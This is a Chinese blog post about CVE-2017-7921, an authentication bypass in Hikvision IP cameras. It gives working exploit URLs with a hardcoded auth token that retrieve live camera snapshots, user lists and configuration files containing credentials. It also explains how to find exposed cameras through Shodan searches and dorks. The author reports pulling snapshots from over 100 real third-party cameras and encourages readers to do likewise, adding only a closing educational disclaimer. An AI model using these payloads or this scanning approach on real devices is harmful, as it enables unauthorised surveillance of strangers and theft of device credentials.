你的网络摄像头怎么沦为黑客的玩具

admin 2024年3月6日20:22:55评论19 views字数 1411阅读4分42秒阅读模式

你的网络摄像头怎么沦为黑客的玩具

    什么是CVE-2017-7921?

CVE-2017-7921是自 2014 年以来在许多海康威视版本中发现的不正确身份验证问题。通过此漏洞,我们能够获取系统配置文件、包含凭据的敏感系统文件,甚至能够获取摄像头的快照实时。当应用程序未充分验证用户身份时,就会出现不正确的身份验证漏洞。

以下 Hikvision 版本易受攻击
Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 至 V5.4.0 build 160530、DS-2CD2xx0F-I Series V5.2.0 build 140721 至 V5.4.0 Build 160401、DS-2CD2xx2FWD Series V5。3.1 版本 150410 至 V5.4.4 版本 161125、DS-2CD4x2xFWD 系列 V5.2.0 版本 140721 至 V5.4.0 版本 160414、DS-2CD4xx5 系列 V5.2.0 版本 140721 至 V5.4.0 版本 160421、DS-2DFx 系列 V5.2.0 版本140805 至 V5.4.5 Build 160928,以及 DS-2CD63xx 系列 V5.0.9 build 140305 至 V5.3.5 Build 160106 设备。

    这个漏洞就像一个后门,我们可以将有效的身份验证令牌插入到简单的“令牌”参数中并获得访问权限!是一个非常容易利用的漏洞。

我们可以使用这个有效负载来利用它:

http://IP_VULNERABLE/onvif-http/snapshot?auth=YWRtaW46MTEK

然后我们就得到了实时相机快照!

你的网络摄像头怎么沦为黑客的玩具

易受攻击的摄像头的模糊快照

通过此身份验证令牌利用此缺陷,我们可以获得有关设备的更多信息。

我们可以检索所有用户及其角色的列表:

http:// IP_VULNERABLE /Security/users?auth=YWRtaW46MTEK

你的网络摄像头怎么沦为黑客的玩具

获取所有相机配置文件:

http:// IP_VULNERABLE /System/configurationFile?auth=YWRtaW46MTEK

    现在我们知道如何利用这个漏洞,如何获取用户、配置文件,甚至如何实时查看摄像头。但我们如何才能找到易受攻击的摄像头呢?

尽管这是一个自 2014 年以来就存在并于 2017 年被发现的安全漏洞,但互联网上仍然在线的许多 IP 摄像头都使用这个过时且易受攻击的固件。我们可以创建一个 python 脚本来搜索 Shodan 中是否存在易受攻击的相机,一小时内,我在互联网上发现了 100 多个易受攻击的摄像头。

即使在今天,易受攻击的相机数量仍然非常多。您可以通过互联网轻松找到易受攻击的设备并查看实时快照以及敏感配置文件。

我们从易受攻击的设备实时获取大量快照:

你的网络摄像头怎么沦为黑客的玩具

您可以使用不同的 dork 来获得更好的结果。

最后:

    即使在今天,IP 摄像机中的漏洞仍然非常普遍。保持软件最新至关重要,以防止可能损害您的隐私和身体完整性的潜在事故。如果不加以解决,诸如此类的简单缺陷可能会导致严重损害。在对容易受到旧漏洞影响的相机进行这项调查时,我们观察到有多少人忘记更新他们的软件,并且很容易受到未经授权的访问。必须强调的是,未经适当授权而利用此漏洞是非法且不道德的。本文中提供的“poc ”仅用于教育目的,以提高人们对潜在风险的认识,并促进向海康威视或其他相关机构负责任地披露信息。

原文始发于微信公众号(KK安全说):你的网络摄像头怎么沦为黑客的玩具

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月6日20:22:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   你的网络摄像头怎么沦为黑客的玩具http://cn-sec.com/archives/2552683.html

发表评论

匿名网友 填写信息